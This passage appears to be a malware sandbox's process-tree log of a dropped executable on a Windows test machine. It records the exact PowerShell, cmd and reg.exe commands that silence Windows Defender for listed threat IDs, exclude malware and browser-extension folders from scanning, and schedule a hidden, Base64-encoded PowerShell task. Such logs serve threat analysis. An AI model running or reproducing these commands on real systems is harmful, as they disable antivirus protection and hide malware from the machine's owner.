                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2884 -ip 2884
                                                                                                                      1⤵
                                                                                                                        PID:928
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2884 -ip 2884
                                                                                                                        1⤵
                                                                                                                          PID:2580
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\ReHoYmc.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\ReHoYmc.exe DF /site_id 690689 /S
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          PID:4708
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                            2⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2060
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:3568
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:3964
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:3040
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:4740
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:4128
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:3892
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:2340
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:3880
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:2540
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:3804
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2268
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2528
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3084
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2780
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1680
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3460
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:340
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2408
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3312
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3388
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3292
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1316
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4556
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1292
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1116
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1232
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4456
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4716
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3328
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:4820
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3040
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:4740
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3892
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1572
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1464
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3460
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5064
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4556
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2044
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4988
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5008
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:1624
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4048
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5052
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2628
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3916
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:464
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2020
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3904
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:3152
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4760
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "gbuklpUJi" /SC once /ST 05:22:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:3832
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1572
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /run /I /tn "gbuklpUJi"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:340
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
